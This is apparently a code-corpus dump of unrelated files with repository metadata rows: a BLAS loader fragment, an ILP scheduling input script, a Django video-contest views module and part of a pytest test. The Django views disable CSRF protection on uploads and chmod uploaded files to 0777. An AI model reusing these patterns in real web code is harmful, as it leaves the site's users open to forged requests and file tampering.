# True if the BLAS .so or .dll file is in the blaspy/lib subdirectory,
# False if Python should search for it.
IN_BLASPY_SUBDIRECTORY = True # default is True
###############################
# DO NOT EDIT BELOW THIS LINE #
###############################
# find the appropriate BLAS to use
if BLAS_NAME == "": # try to use included OpenBLAS
PREPEND = str(path.dirname(__file__))[:-6] + "lib/"
if system() == "Windows":
if calcsize("P") == 8: # 64-bit
BLAS_NAME = "libopenblas-0.2.13-win64-int32.dll"
chdir(PREPEND + "win64")
else: # 32-bit
BLAS_NAME = "libopenblas-0.2.13-win32.dll"
chdir(PREPEND + "win32")
PREPEND = ""
elif system() == "Linux":
if calcsize("P") == 8: # 64-bit
BLAS_NAME = "libopenblas-0.2.13-linux64.so"
PREPEND += "linux64/"
else: # 32-bit
BLAS_NAME = "libopenblas-0.2.13-linux32.so"
PREPEND += "linux32/"
else: # no appropriate OpenBLAS included, BLAS_NAME_OVERRIDE must be used
raise_blas_os_error()
else:
PREPEND = ""
# Change the directory and load the library
_libblas = cdll.LoadLibrary(PREPEND + BLAS_NAME)
|
bsd-3-clause
| -4,852,845,395,253,406,000
| 34.490909
| 96
| 0.627883
| false
| 3.358003
| false
| false
| false
|
manub686/atomix
|
r1cmplr/lpinput.py
|
1
|
19222
|
#!/usr/bin/env python
'''
Atomix project, lpinput.py, (TODO: summary)
Copyright (c) 2015 Stanford University
Released under the Apache License v2.0. See the LICENSE file for details.
Author(s): Manu Bansal
'''
import numpy as np
import sys
def main():
inpfile = sys.argv[1]
(inp, out) = lpinput(inpfile)
print inp
print out
def lpinput(inpfile):
#[inp, opt] = example();
#[inp, opt] = example1();
#[inp, opt] = example2();
#[inp, opt] = wifi_6mbps_steady_state();
#[inp, opt] = wifi_54mbps_steady_state();
(inp, opt) = new_flowgraphs(inpfile);
return (inp, opt)
def new_flowgraphs(inpfile):
opt = {}
inp = {}
#problem = 'wifi_54mbps_split';
#opt["lpoutfile"] = problem + '.lp';
opt["minimize_makespan"] = 1;
opt["constraints_no_overbook"] = 1;
opt["constraints_communication_allowance"] = 1;
opt["extra_information_zero_y_i_j"] = 0;
opt["relaxation_x_not_integer"] = 1;
opt["constant_scale_down_factor"] = 1;
# d = 12000; #deadline
D = 100000000; #"infinity" equivalent in expressing the ILP
#run(['wifi_schedule_data/' problem '.m']);
modname = inpfile.split('.py')[0]
print modname
mod = __import__(modname)
(p,G,q, dl,T) = mod.model(D)
print("DEADLINE = %d"%dl)
d = dl ## State Deadline
#n = size(p, 1);
#m = size(p, 2);
n = p.shape[0]; #number of jobs to schedule
m = p.shape[1]; #number of processors
print n, m
#raw_input()
# Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
#cpu2viterbi = 100;
#cpu2cpu = 1000;
# FIFO transfer time on same processor
#singular_fifo_transfer_time = 200;
#q = D*np.ones((m,m), dtype=np.int);
#for ii in range(4):
# for jj in range(4):
# if ii == jj:
# q[ii][jj] = singular_fifo_transfer_time;
# else:
# q[ii][jj] = cpu2cpu;
#for ii in range(4):
#for jj in range(3,9):
# for jj in range(4,8):
# q[ii][jj] = cpu2viterbi;
# q[jj][ii] = cpu2viterbi;
print
print "q matrix:"
print q
inp["n"] = n;
inp["d"] = d;
inp["D"] = D;
inp["G"] = G;
inp["m"] = m;
inp["p"] = p;
inp["q"] = q;
inp["T"] = T
return (inp, opt)
#function [inp, opt] = example1()
# opt["lpoutfile"] = 'example1.lp'
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# n = 4; d = 20000; G = [ 1,2; 2,3; 3,4];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9 %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ]
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#function [inp, opt] = example2()
# opt["lpoutfile"] = 'example2.lp'
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# n = 8; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8];
# %n = 7; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9 %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ]
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#
#% 1 kFunctionUids_PacketSearch_PutUnalignedGetAligned,
#% 2 kFunctionUids_CfoCorrectorWifi_ApplyGainAndCorrectCfo,
#% 3 kFunctionUids_OfdmDemodulator64pCp16_demodulate,
#% 4 kFunctionUids_OfdmEqualizer_Equalize,
#%
#% 5 kFunctionUids_SoftDemapper_BpskFromYhstar,
#% 6 kFunctionUids_DeinterleaverLutWifi_Deinterleave,
#% 7 kFunctionUids_ViterbiBranchMetrics_calculate,
#% 8 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#%
#% 9 <mid decode happens on the VCP>
#%
#% 10 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 11 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 12 kFunctionUids_DescramblerWifi_Descramble,
#% 13 kFunctionUids_Crc32Wifi_UpdateCrc32
#
#% G: 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7 -> 8 -> 9 -> 10 -> 11 -> 12 -> 13
#% As expressed by the user, the graph has total dependency for a single iteration. The scheduler
#% must come up with a pipelined schedule to meet throughput requirements.
#%
#% Compute times on cpu/vcp:
#% 1: 200, 2: 400, 3: 200, 4: 600,
#% 5: 200, 6: 200, 7: 200, 8: 100,
#% 9: 4000 (vcp), D (cpu)
#% 10: 100, 11: 200, 12: 100, 13: 100
#
#function [inp, opt] = wifi_6mbps_steady_state()
# opt["lpoutfile"] = 'wifi_6mbps_steady_state.lp';
# opt["minimize_makespan"] = 0;
# %opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# n = 13; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7; 7,8; 8,9; 9,10; 10,11; 11,12; 12,13];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#function [inp, opt] = wifi_9mbps_steady_state()
#
#end
#
#function [inp, opt] = example()
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# opt["constant_scale_down_factor"] = 1;
# %opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% d = 4800
#% D = 5000
#
#% d = 9600
#% D = 10000
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
#% n = 10 %number of jobs in the compute graph G
#%
#%
#%
#% G = [...
#% 1, 2;...
#% 2, 3;...
#% 3, 4;...
#% ...
#% 4, 5;...
#% 5, 6;...
#% ...
#% 4, 7;...
#% 7, 8;...
#% 8, 9;...
#% ...
#% 6, 10;...
#% 9, 10;...
#% ]
#
#
# %n = 10; d = 12000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,10; 9,10;]
# %n = 9; d = 9000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,9; ]
# n = 9; d = 20000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8; 8,9; 6,9; ]
# %n = 8; d = 4800; G = [1,2; 2,3; 3,4; 4,5; 5,6; 4,7; 7,8;]
# %n = 5; d = 2400; G = [ 1,2; 2,3; 3,4; 4,5; ]
#
# %G = randomDirectedGraph(n)
#
# D = d + 100;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, 200, 200;...
# ...
# 500, 500, 500, D, D, D, D, D, D;...
# 8000, 8000, 8000, 4000, 4000, 4000, 4000, D, D;...
# ...
# 500, 500, 500, D, D, D, D, D, D;...
# 300, 300, 300, D, D, D, D, D, D;...
# 8000, 8000, 8000, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
#% q = [...
#% 0, 100, 100, 50, 50, 50, 50, 50, 50;...
#% 100, 0, 100, 50, 50, 50, 50, 50, 50;...
#% 100, 100 0, 50, 50, 50, 50, 50, 50;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% 50, 50, 50, D, D, D, D, D, D;...
#% ]
#
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
#
#% 1 kFunctionUids_PacketSearch_PutUnalignedGetAligned,
#% 2 kFunctionUids_CfoCorrectorWifi_ApplyGainAndCorrectCfo,
#% 3 kFunctionUids_OfdmDemodulator64pCp16_demodulate,
#% 4 kFunctionUids_OfdmEqualizer_Equalize,
#%
#% 5 kFunctionUids_SoftDemapper_64qamTable,
#% 6 kFunctionUids_DeinterleaverLutWifi_Deinterleave,
#% 7 kFunctionUids_ViterbiBranchMetrics_calculate,
#%
#% 8 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 9 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 10 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#% 11 kFunctionUids_ViterbiDecoderWifi_MidDecode_Start,
#%
#% 12 <mid decode happens on the VCP>
#% 13 <mid decode happens on the VCP>
#% 14 <mid decode happens on the VCP>
#% 15 <mid decode happens on the VCP>
#%
#% 16 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 17 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 18 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#% 19 kFunctionUids_ViterbiDecoderWifi_WaitForCompletion,
#
#% 20 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 21 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 22 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#% 23 kFunctionUids_ViterbiDecoderWifi_MidDecode_Finish,
#
#% 24 kFunctionUids_DescramblerWifi_Descramble,
#% 25 kFunctionUids_Crc32Wifi_UpdateCrc32
#
#% G: 1 -> 2 -> 3 -> 4 -> 5 -> 6 -> 7
#% 7 -> 8 -> 12 -> 16 -> 20
#% 7 -> 9 -> 13 -> 17 -> 21
#% 7 -> 10 -> 14 -> 18 -> 22
#% 7 -> 11 -> 15 -> 19 -> 23
#% 20 -> 24
#% 21 -> 24
#% 22 -> 24
#% 23 -> 24
#% 24 -> 25
#
#% As expressed by the user, the graph has total dependency for a single iteration. The scheduler
#% must come up with a pipelined schedule to meet throughput requirements.
#%
#% Compute times on cpu/vcp:
#% 1: 200, 2: 400, 3: 200, 4: 600,
#% 5: 200, 6: 200, 7: 200, 8: 100, 9: 100, 10:100, 11:100
#% 12, 13, 14, 15: 4000 (vcp), D (cpu)
#% 16, 17, 18, 19: 100
#% 20, 21, 22, 23: 200
#% 24: 100, 25: 100
#
#
#function [inp, opt] = wifi_54mbps_steady_state()
# opt["lpoutfile"] = 'wifi_54mbps_steady_state.lp';
# %opt["minimize_makespan"] = 0;
# opt["minimize_makespan"] = 1;
#
# opt["constraints_no_overbook"] = 1;
# opt["constraints_communication_allowance"] = 1;
# opt["extra_information_zero_y_i_j"] = 0;
# opt["relaxation_x_not_integer"] = 1;
#
# %opt["constant_scale_down_factor"] = 100;
# opt["constant_scale_down_factor"] = 1;
#
# % Given input:
#
#% % Compute graph G with n compute nodes called jobs {J1, J2, ..., Jn}. Each job needs to execute exactly once without preemption. Jobs have processor affinities characterized ahead.
# %n = 25; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# %n = 25; d = 10000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# %n = 25; d = 15000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# n = 25; d = 20000; G = [ 1,2; 2,3; 3,4; 4,5; 5,6; 6,7;...
# 7,8; 8,12; 12,16; 16,20;...
# 7,9; 9,13; 13,17; 17,21;...
# 7,10; 10,14; 14,18; 18,22;...
# 7,11; 11,15; 15,19; 19,23;...
# 20,24;...
# 21,24;...
# 22,24;...
# 23,24;...
# 24,25;...
# ];
# %D = d + 100;
# D = 2 * d;
#
# % Hardware definition consisting of m processors {M1, M2, ..., Mm}. (M is used to denote a machine in the notion of the well-known job-shop problem which is analogous to processor in our problem). Processors may be identical or different.
# m = 9; %3 dsps, 4 vcps, 2 fcps
#
# % Compute times of jobs on processors: {pij}, 1 i n, 1 j m. If a job i cannot be executed on a certain processor j, pij = inf, where inf is a large enough value to be specified later. This lets us model job-processor affinity.
# p = [...
# 200, 200, 200, D, D, D, D, D, D;...
# 400, 400, 400, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 600, 600, 600, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# D, D, D, 4000, 4000, 4000, 4000, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# 200, 200, 200, D, D, D, D, D, D;...
# ...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
# % Communication costs between different processors (for some fixed transfer size): {qij}, 1 i m, 1 j m
# q = [...
# 0, 200, 200, 100, 100, 100, 100, 100, 100;...
# 200, 0, 200, 100, 100, 100, 100, 100, 100;...
# 200, 200 0, 100, 100, 100, 100, 100, 100;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# 100, 100, 100, D, D, D, D, D, D;...
# ];
#
#
# inp["n"] = n;
# inp["d"] = d;
# inp["D"] = D;
# inp["G"] = G;
# inp["m"] = m;
# inp["p"] = p;
# inp["q"] = q;
#end
#
if __name__ == "__main__":
main()
|
apache-2.0
| 297,183,618,561,606,400
| 32.487805
| 242
| 0.546769
| false
| 2.052536
| false
| false
| false
|
NicolasBonet/cloud
|
videosapp/views.py
|
1
|
8807
|
from django.views.decorators.csrf import csrf_exempt
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import get_object_or_404, render_to_response, render
from django.core.urlresolvers import reverse
from django.template import RequestContext
from django.contrib.auth.forms import UserCreationForm
from videosapp.forms import *
from videosapp.models import Concurso
from videosapp.models import Video
from django.core.paginator import Paginator, InvalidPage, EmptyPage
import dateutil.parser
import datetime
import os.path
from django.core.mail import send_mail
from django.conf import settings
from moviepy.editor import *
def index(request):
return render(request, "index.html")
def post_registrarse(request):
if request.user.is_authenticated():
raise Exception("Ya estas registrado");
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
if (request.POST['password2'] != request.POST['password1']):
raise Exception("Las contrasenas no coinciden");
new_user = form.save()
new_user.email = request.POST['email']
new_user.first_name = request.POST['first_name']
new_user.last_name = request.POST['last_name']
new_user.save()
return render_to_response("registro.html", dict(mensajeExito="Usuario creado!"), RequestContext(request))
else:
return render_to_response("registro.html", dict(mensajeError=form.errors), RequestContext(request))
else:
form = UserCreationForm()
return render(request, "registro.html", {
'form': form,
})
def post_concurso(request):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
vahora = str(datetime.datetime.now())
vahora = vahora.split(' ')
if request.method == 'POST':
form = ConcursoCreationForm(request.POST, request.FILES)
# If data is valid, proceeds to create a new post and redirect the user
if form.is_valid():
if (Concurso.objects.filter(url = request.POST['url'].lower()).count() > 0):
raise Exception("Esa URL ya esta siendo usada por otro concurso");
new_concurso = form.save()
new_concurso.user = request.user
new_concurso.url = new_concurso.url.lower()
new_concurso.fecha_inicio = dateutil.parser.parse(request.POST['fecha_inicio'])
new_concurso.fecha_fin = dateutil.parser.parse(request.POST['fecha_fin'])
new_concurso.url = request.POST['url'].lower()
new_concurso.save()
return HttpResponseRedirect("/perfil")
else:
return render_to_response("crear_concurso.html", dict(
mensajeError=form.errors, ahora = vahora[0]), RequestContext(request))
else:
form = ConcursoCreationForm()
return render(request, "crear_concurso.html", {
'form': form,
'ahora': vahora[0],
})
def editar_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
if (request.user <> concurso.user):
raise Exception("No estas autorizado");
if request.method == 'POST':
urlNueva = request.POST['url'].lower()
if (Concurso.objects.filter(url = urlNueva).exclude(id = concurso.id).count() > 0):
return render_to_response("editar_concurso.html",
dict(mensajeError = "Url " + urlNueva + " en uso!",
concurso = concurso, ahora = str(concurso.fecha_inicio), fin = str(concurso.fecha_fin)),
RequestContext(request))
concurso.nombre = request.POST['nombre']
concurso.url = urlNueva
concurso.descripcion = request.POST['descripcion']
concurso.fecha_inicio = dateutil.parser.parse(request.POST['fecha_inicio'])
concurso.fecha_fin = dateutil.parser.parse(request.POST['fecha_fin'])
concurso.save()
return HttpResponseRedirect("/perfil")
ahora = str(concurso.fecha_inicio)
fin = str(concurso.fecha_fin)
return render(request, "editar_concurso.html", {
'ahora': ahora,
'fin': fin,
'concurso': concurso,
})
def borrar_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
if (request.user <> concurso.user):
raise Exception("No estas autorizado");
concurso.delete()
return HttpResponseRedirect("/perfil")
def detalle_concurso(request, i="0"):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
concurso = Concurso.objects.get(id=i)
if (request.user <> concurso.user):
raise Exception("No estas autorizado");
videos = Video.objects.all().filter(concurso=concurso)
paginator = Paginator(videos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
videos = paginator.page(page)
except (InvalidPage, EmptyPage):
videos = paginator.page(paginator.num_pages)
return render_to_response("videosadmin.html", dict(videos=videos, user=request.user))
def perfil(request):
if not request.user.is_authenticated():
raise Exception("Debes estar registrado");
#concursos = Concurso.objects.get(user=request.user)
concursos = Concurso.objects.all().filter(user=request.user).order_by('-fecha_inicio')
paginator = Paginator(concursos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
concursos = paginator.page(page)
except (InvalidPage, EmptyPage):
concursos = paginator.page(paginator.num_pages)
return render_to_response("list.html", dict(concursos=concursos, user=request.user), context_instance=RequestContext(request))
def concurso(request, urlConcurso="0"):
c = Concurso.objects.get(url=urlConcurso.lower())
videos = Video.objects.all().filter(concurso=c, convertido=True)
paginator = Paginator(videos, 50)
try: page = int(request.GET.get("page", '1'))
except ValueError: page = 1
try:
videos = paginator.page(page)
except (InvalidPage, EmptyPage):
videos = paginator.page(paginator.num_pages)
return render_to_response("concurso.html", dict(videos=videos, user=request.user, concurso=c, page=page), RequestContext(request))
@csrf_exempt
def subir_video(request, urlConcurso="0"):
c = Concurso.objects.get(url=urlConcurso.lower())
if request.method == 'POST':
form = UploadForm(request.POST, request.FILES)
if form.is_valid():
video = form.save()
video.convertido = False
video.correo_usuario = request.POST['correo_usuario']
video.nombre_usuario = request.POST['nombre_usuario']
video.apellidos_usuario = request.POST['apellidos_usuario']
video.concurso = Concurso.objects.get(url=urlConcurso)
video.save()
return render_to_response("subir_video.html", dict(concurso=c, mensajeExito="Hemos recibido tu video y los estamos procesado para que sea publicado. Tan pronto el video quede publicado en la pagina del concurso te notificaremos por email"), RequestContext(request))
else:
return render_to_response("subir_video.html", dict(concurso=c, mensajeError=form.errors), RequestContext(request))
else:
form = UploadForm()
return render_to_response("subir_video.html", dict(concurso=c), RequestContext(request))
def convert_video(request):
if (os.path.isfile("temp-audio.m4a")):
return None
video = Video.objects.filter(convertido=False).order_by('fecha_inicio')[:1].get()
videopath = settings.BASE_DIR + settings.STATIC_URL + "videos/" + os.path.basename(video.video.name)
os.chmod(videopath, 0777)
clip = VideoFileClip(videopath)
send_mail('El video convertido!', 'Felicitaciones, el video que subiste titulado "' + video.nombre + '" ha sido convertido y aprobado!', 'soportetecnico233@gmail.com', ['nibogo2@gmail.com'])
clip.write_videofile(settings.BASE_DIR + settings.STATIC_URL + "convertidos/" + str(video.id) + ".mp4",
codec='libx264',
audio_codec='aac',
temp_audiofile='temp-audio.m4a',
remove_temp=True
)
send_mail('El video ' + video.nombre + ' ha sido convertido!', 'Felicitaciones, el video que subiste titulado "' + video.nombre + '" ha sido convertido y aprobado!', 'soportetecnico233@gmail.com', [video.correo_usuario])
video.convertido = True
video.save()
|
agpl-3.0
| 8,715,289,717,513,734,000
| 38.316964
| 277
| 0.660384
| false
| 3.437549
| false
| false
| false
|
pythonindia/wye
|
tests/functional/test_edit_profile.py
|
1
|
6792
|
import pytest
from .. import base
from .. import factories as f
from .. utils import create_user_verify_login
pytestmark = pytest.mark.django_db
def create_user_type(slug='tutor'):
tutor_type = f.create_usertype(slug=slug, display_name=slug)
return tutor_type
def test_signup_college_poc_flow(base_url, browser, outbox):
create_user_type(slug='tutor')
user = create_user_verify_login(base_url, browser, outbox)
browser.fill('login', user.email)
browser.fill('password', '123123')
browser.find_by_css('[type=submit]')[0].click()
# assert browser.is_text_present("My Profile")
poc_type = f.create_usertype(slug='poc', display_name='College POC')
user.profile.usertype.clear()
user.profile.usertype.add(poc_type)
user.profile.save()
user.save()
section1 = f.create_workshop_section(name='section1')
location1 = f.create_locaiton(name='location1')
state1 = f.create_state(name='state1')
# mobile number chechk
url = base_url + '/profile/' + user.username + '/edit/'
browser.visit(url)
browser.fill('mobile', '')
browser.select('interested_sections', section1.id)
browser.select('location', location1.id)
browser.select('interested_states', state1.id)
browser.find_by_css('[type=submit]')[0].click()
assert browser.is_text_present('This field is required.')
# interested state check
browser.fill('mobile', '1234567890')
browser.select('location', location1.id)
